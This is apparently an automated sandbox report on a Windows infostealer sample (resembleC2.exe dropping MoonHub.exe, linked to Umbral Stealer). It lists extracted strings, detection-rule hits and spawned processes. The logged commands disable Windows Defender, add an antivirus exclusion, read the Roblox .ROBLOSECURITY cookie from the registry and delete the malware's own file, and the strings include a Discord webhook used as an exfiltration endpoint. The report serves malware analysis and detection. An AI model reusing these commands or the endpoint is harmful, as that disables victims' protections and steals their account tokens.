                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3349008957.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E80005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAE8000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                            Source: gqnbO.scr.5.drString found in binary or memory: https://discord.com/api/v10/users/
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQ
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: https://discordapp.com/api/v9/users/
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr.
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chro0b
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.0b
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                            Source: gqnbO.scr.5.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-StealerhT
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                            Source: powershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:50018 version: TLS 1.2

                            Spam, unwanted Advertisements and Ransom Demands

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe File written: C:\Windows\System32\drivers\etc\hosts

                            System Summary

                            Source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E59C2E NtProtectVirtualMemory,2_2_00007FF848E59C2E
                            Source: 6z2guuz0ldkdgc1o.exe.0.drStatic PE information: No import functions for PE file found
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2184086711.000000001BB94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOpenWith.exe.muij% vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2184086711.000000001BB94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOpenWith.exej% vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs resembleC2.exe
                            Source: resembleC2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: resembleC2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@45/27@7/4
                            Source: C:\Users\user\Desktop\resembleC2.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\resembleC2.exe.log
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeMutant created: \Sessions\1\BaseNamedObjects\J4sbYWr8St4yEiEwQYUu
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
                            Source: C:\Users\user\Desktop\resembleC2.exeMutant created: \Sessions\1\BaseNamedObjects\OdHMbp0RVvgQTSYNU
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                            Source: C:\Users\user\Desktop\resembleC2.exe File created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
                            Source: resembleC2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\resembleC2.exe File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\resembleC2.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA14000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA06000.00000004.00000800.00020000.00000000.sdmp, n3lt0LNlJJ55VO6.5.dr, pen0yrlLc65gBsT.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: resembleC2.exeReversingLabs: Detection: 57%
                            Source: resembleC2.exeVirustotal: Detection: 58%
                            Source: unknownProcess created: C:\Users\user\Desktop\resembleC2.exe "C:\Users\user\Desktop\resembleC2.exe"
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: C:\Users\user\Desktop\resembleC2.exe Process created: C:\Users\user\AppData\Local\Temp\MoonHub.exe "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
                            Source: C:\Users\user\Desktop\resembleC2.exe Process created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
